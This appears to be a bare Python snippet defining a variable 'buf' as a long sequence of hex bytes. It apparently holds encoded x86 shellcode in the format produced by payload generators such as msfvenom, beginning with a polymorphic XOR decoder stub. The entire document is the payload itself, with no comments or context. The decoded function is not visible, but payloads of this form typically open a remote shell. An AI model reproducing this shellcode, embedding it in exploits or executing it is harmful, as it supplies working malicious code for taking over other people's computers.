buf =  b""
buf += b"\xba\xe9\x41\x9a\x8c\xd9\xc8\xd9\x74\x24\xf4\x58\x33"
buf += b"\xc9\xb1\x52\x31\x50\x12\x03\x50\x12\x83\x29\x45\x78"
buf += b"\x79\x55\xae\xfe\x82\xa5\x2f\x9f\x0b\x40\x1e\x9f\x68"
buf += b"\x01\x31\x2f\xfa\x47\xbe\xc4\xae\x73\x35\xa8\x66\x74"
buf += b"\xfe\x07\x51\xbb\xff\x34\xa1\xda\x83\x46\xf6\x3c\xbd"
buf += b"\x88\x0b\x3d\xfa\xf5\xe6\x6f\x53\x71\x54\x9f\xd0\xcf"
buf += b"\x65\x14\xaa\xde\xed\xc9\x7b\xe0\xdc\x5c\xf7\xbb\xfe"
buf += b"\x5f\xd4\xb7\xb6\x47\x39\xfd\x01\xfc\x89\x89\x93\xd4"
buf += b"\xc3\x72\x3f\x19\xec\x80\x41\x5e\xcb\x7a\x34\x96\x2f"
buf += b"\x06\x4f\x6d\x4d\xdc\xda\x75\xf5\x97\x7d\x51\x07\x7b"
buf += b"\x1b\x12\x0b\x30\x6f\x7c\x08\xc7\xbc\xf7\x34\x4c\x43"
buf += b"\xd7\xbc\x16\x60\xf3\xe5\xcd\x09\xa2\x43\xa3\x36\xb4"
buf += b"\x2b\x1c\x93\xbf\xc6\x49\xae\xe2\x8e\xbe\x83\x1c\x4f"
buf += b"\xa9\x94\x6f\x7d\x76\x0f\xe7\xcd\xff\x89\xf0\x32\x2a"
buf += b"\x6d\x6e\xcd\xd5\x8e\xa7\x0a\x81\xde\xdf\xbb\xaa\xb4"
buf += b"\x1f\x43\x7f\x1a\x4f\xeb\xd0\xdb\x3f\x4b\x81\xb3\x55"
buf += b"\x44\xfe\xa4\x56\x8e\x97\x4f\xad\x59\x92\x86\xad\x31"
buf += b"\xca\x9a\xad\x50\x57\x12\x4b\x38\x77\x72\xc4\xd5\xee"
buf += b"\xdf\x9e\x44\xee\xf5\xdb\x47\x64\xfa\x1c\x09\x8d\x77"
buf += b"\x0e\xfe\x7d\xc2\x6c\xa9\x82\xf8\x18\x35\x10\x67\xd8"
buf += b"\x30\x09\x30\x8f\x15\xff\x49\x45\x88\xa6\xe3\x7b\x51"
buf += b"\x3e\xcb\x3f\x8e\x83\xd2\xbe\x43\xbf\xf0\xd0\x9d\x40"
buf += b"\xbd\x84\x71\x17\x6b\x72\x34\xc1\xdd\x2c\xee\xbe\xb7"
buf += b"\xb8\x77\x8d\x07\xbe\x77\xd8\xf1\x5e\xc9\xb5\x47\x61"
buf += b"\xe6\x51\x40\x1a\x1a\xc2\xaf\xf1\x9e\xe2\x4d\xd3\xea"
buf += b"\x8a\xcb\xb6\x56\xd7\xeb\x6d\x94\xee\x6f\x87\x65\x15"
buf += b"\x6f\xe2\x60\x51\x37\x1f\x19\xca\xd2\x1f\x8e\xeb\xf6"
